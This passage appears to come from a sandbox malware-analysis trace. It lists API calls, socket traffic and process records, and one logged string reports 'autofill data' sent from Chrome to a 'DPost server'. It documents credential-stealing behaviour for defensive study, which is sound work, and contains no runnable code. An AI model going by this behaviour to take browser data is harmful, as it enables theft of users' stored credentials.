	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3a7f88
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x12) returned 0x390638
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x44) returned 0x386500
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2a) returned 0x38a678
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x5d) returned 0x3a8280
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384d80
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40) returned 0x384c18
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x11) returned 0x390678
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3a7f70
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac080
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3aaf18
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac098
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xe) returned 0x3ac0b0
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x58) returned 0x3ab448
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390678 | out: hHeap=0x370000) returned 1
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x58) returned 0x3ab4a8
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab448 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x18) returned 0x390678
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xd0) returned 0x39d038
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1b90
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1e) returned 0x3aa290
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x52) returned 0x3ab448
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac0c8
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3aa470
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0c8 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac0c8
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1b2) returned 0x3aafa0
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab4a8 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390678 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39d038 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1b90 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa290 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ab448 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa470 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0c8 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aaf18 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac098 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0b0 | out: hHeap=0x370000) returned 1
	[0220.486] GetProcessHeap () returned 0x370000
	[0220.486] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7f70 | out: hHeap=0x370000) returned 1
	[0220.487] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.487] send (s=0x1e8, buf=0x3aafac*, len=421, flags=0) returned 421
	[0220.487] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0220.487] GetProcessHeap () returned 0x370000
	[0220.487] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2c) returned 0x38a678
	[0220.487] GetProcessHeap () returned 0x370000
	[0220.487] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0220.487] GetProcessHeap () returned 0x370000
	[0220.487] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2c) returned 0x38a678
	[0220.487] GetProcessHeap () returned 0x370000
	[0220.487] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0220.487] GetProcessHeap () returned 0x370000
	[0220.487] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2e) returned 0x38a678
	[0220.487] GetProcessHeap () returned 0x370000
	[0220.487] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0220.487] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.487] send (s=0x1e8, buf=0x470000*, len=286, flags=0) returned 286
	[0220.487] VirtualFree (lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0220.488] GetProcessHeap () returned 0x370000
	[0220.488] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3a7f70
	[0220.488] GetProcessHeap () returned 0x370000
	[0220.488] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3aaf18
	[0220.488] GetProcessHeap () returned 0x370000
	[0220.488] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3aaf18, Size=0x100) returned 0x3abc30
	[0220.488] GetProcessHeap () returned 0x370000
	[0220.488] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1000) returned 0x3ac468
	[0220.488] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.488] recv (in: s=0x1e8, buf=0x3ac468, len=4096, flags=0 | out: buf=0x3ac468*) returned 139
	[0223.130] GetProcessHeap () returned 0x370000
	[0223.130] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3ac080
	[0223.130] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0223.131] GetProcessHeap () returned 0x370000
	[0223.131] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x91) returned 0x3abd38
	[0223.131] VirtualFree (lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3abc30 | out: hHeap=0x370000) returned 1
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7f70 | out: hHeap=0x370000) returned 1
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3a7f70
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3aaf18
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3aaf18, Size=0x100) returned 0x3abc30
	[0223.132] GetProcessHeap () returned 0x370000
	[0223.132] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3ac080
	[0223.132] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0223.132] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.132] recv (in: s=0x1e8, buf=0x3ac468, len=4096, flags=0 | out: buf=0x3ac468) returned 0
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac098
	[0223.133] VirtualFree (lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3abc30 | out: hHeap=0x370000) returned 1
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7f70 | out: hHeap=0x370000) returned 1
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac468 | out: hHeap=0x370000) returned 1
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x91) returned 0x3abc30
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x3a7f70
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac080
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x3aaf18
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac0b0
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xe) returned 0x3ac0c8
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aaf18 | out: hHeap=0x370000) returned 1
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1c) returned 0x3aa470
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac0e0
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1e) returned 0x3aa290
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1b) returned 0x3aa538
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a678
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1e) returned 0x3aa560
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3ac0e0, Size=0x20) returned 0x3aa588
	[0223.133] GetProcessHeap () returned 0x370000
	[0223.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x25) returned 0x39e680
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x15) returned 0x390678
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3ac0e0
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0e0 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xf) returned 0x3ac0e0
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x12) returned 0x390698
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x17) returned 0x3906b8
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa470 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa290 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa538 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa560 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e680 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aa588 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac080 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0b0 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3ac0c8 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7f70 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3abd38 | out: hHeap=0x370000) returned 1
	[0223.134] GetProcessHeap () returned 0x370000
	[0223.134] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aafa0 | out: hHeap=0x370000) returned 1
	[0223.134] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0223.134] closesocket (s=0x1e8) returned 0
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1960 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3949b0 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7fb8 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7f88 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3aaae8 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386500 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390638 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.135] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0223.135] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3905d8 | out: hHeap=0x370000) returned 1
	[0223.136] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e5f0 | out: hHeap=0x370000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3905f8 | out: hHeap=0x370000) returned 1
	[0223.136] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e620 | out: hHeap=0x370000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390618 | out: hHeap=0x370000) returned 1
	[0223.136] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e650 | out: hHeap=0x370000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a158 | out: hHeap=0x370000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39bc60 | out: hHeap=0x370000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e5c0 | out: hHeap=0x370000) returned 1
	[0223.136] GetProcessHeap () returned 0x370000
	[0223.136] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39bb88 | out: hHeap=0x370000) returned 1
	[0223.137] GetProcessHeap () returned 0x370000
	[0223.137] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3997d8 | out: hHeap=0x370000) returned 1
	[0223.137] wsprintfA (in: param_1=0x39a050, param_2="Successfully sent autofill data to DPost server: %s" | out: param_1="Successfully sent autofill data to DPost server: Chrome") returned 55
	[0223.137] ResetEvent (hEvent=0xc) returned 1
	[0223.137] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.138] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398438 | out: hHeap=0x370000) returned 1
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.138] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398428 | out: hHeap=0x370000) returned 1
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.138] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x398458 | out: hHeap=0x370000) returned 1
	[0223.138] GetProcessHeap () returned 0x370000
	[0223.138] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39e530 | out: hHeap=0x370000) returned 1
	[0223.138] Sleep (dwMilliseconds=0x7530) 
	[0233.643] GetProcessHeap () returned 0x370000
	[0233.644] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a050 | out: hHeap=0x370000) returned 1

Thread:
	id = 321
	os_tid = 0xdd8


Thread:
	id = 322
	os_tid = 0xdc4


Process:
	id = "39"
	image_name = "dllhost.exe"
	filename = "c:\\windows\\system32\\dllhost.exe"
	page_root = "0x7ee17680"
	os_pid = "0x468"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b7e890"
	monitor_reason = "rpc_server"
	parent_id = "25"
	os_parent_pid = "0x34c"
	cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 227
	os_tid = 0xa88


Thread:
	id = 228
	os_tid = 0xa84


Thread:
	id = 229
	os_tid = 0xa74


Thread:
	id = 230
	os_tid = 0xabc


Thread:
	id = 231
	os_tid = 0xa8c


Thread:
	id = 232
	os_tid = 0xc70


Thread:
	id = 233
	os_tid = 0xa90


Process:
	id = "40"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee17780"
	os_pid = "0xa70"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 234
	os_tid = 0xa6c

	[0214.853] ResetEvent (hEvent=0x8) returned 1
	[0214.853] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0214.853] ResetEvent (hEvent=0x8) returned 1
	[0214.853] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0214.860] LoadLibraryW (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0214.863] ResetEvent (hEvent=0x8) returned 1
	[0214.863] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0214.865] GetProcAddress (hModule=0x75a90000, lpProcName=0x73) returned 0x75a93ab2
	[0214.865] ResetEvent (hEvent=0x8) returned 1
	[0214.865] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0214.868] LoadLibraryW (lpLibFileName="ACTIVEDS.dll") returned 0x6eb70000
	[0215.276] ResetEvent (hEvent=0x8) returned 1
	[0215.276] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.279] GetProcAddress (hModule=0x6eb70000, lpProcName=0x9) returned 0x6eb716e6
	[0215.279] ResetEvent (hEvent=0x8) returned 1
	[0215.279] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.282] LoadLibraryW (lpLibFileName="WININET.dll") returned 0x77230000
	[0215.300] ResetEvent (hEvent=0x8) returned 1
	[0215.300] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.303] GetProcAddress (hModule=0x77230000, lpProcName="InternetConnectW") returned 0x7725492c
	[0215.303] ResetEvent (hEvent=0x8) returned 1
	[0215.303] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.307] GetProcAddress (hModule=0x77230000, lpProcName="InternetReadFile") returned 0x7724b406
	[0215.307] ResetEvent (hEvent=0x8) returned 1
	[0215.307] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.310] GetProcAddress (hModule=0x77230000, lpProcName="HttpSendRequestW") returned 0x7725ba12
	[0215.310] ResetEvent (hEvent=0x8) returned 1
	[0215.310] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.313] GetProcAddress (hModule=0x77230000, lpProcName="InternetOpenW") returned 0x77259197
	[0215.313] ResetEvent (hEvent=0x8) returned 1
	[0215.313] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.316] GetProcAddress (hModule=0x77230000, lpProcName="InternetCloseHandle") returned 0x7724ab49
	[0215.316] ResetEvent (hEvent=0x8) returned 1
	[0215.316] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0215.319] GetProcAddress (hModule=0x77230000, lpProcName="HttpOpenRequestW") returned 0x77254a42
